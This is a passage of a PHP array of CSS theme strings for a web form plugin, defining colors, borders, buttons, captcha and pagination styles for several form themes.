      "8" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n.wdform_table2{\n	width:initial;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n   padding-left:inherit;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#000 !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E0E0E0 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#E0E0E0 !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#818181 !important;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#818181;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#818181;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#818181;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #818181;\r\nmargin-right:3px !important;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #818181;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground-color:#FFFFFF;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #818181;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\nmargin: 2px 5px 3px 0 !important;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus\r\n{\r\nborder: 1px solid #000000;\r\noutline:none;\r\n}\r\n\r\n.wdform_matrix table select:focus\r\n{\r\noutline:none;\r\n}",
      "9" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n     padding-left:inherit;\n		padding-right:inherit;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#778F1D !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#778F1D !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#778F1D !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nborder:1px solid #999;\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FF832B;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\nborder:1px solid #FFFFFF;\r\nborder:1px solid #999;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "10" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n   padding-left:inherit;\n		padding-right:inherit;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#3D9EBE !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#3D9EBE !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#3D9EBE !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer 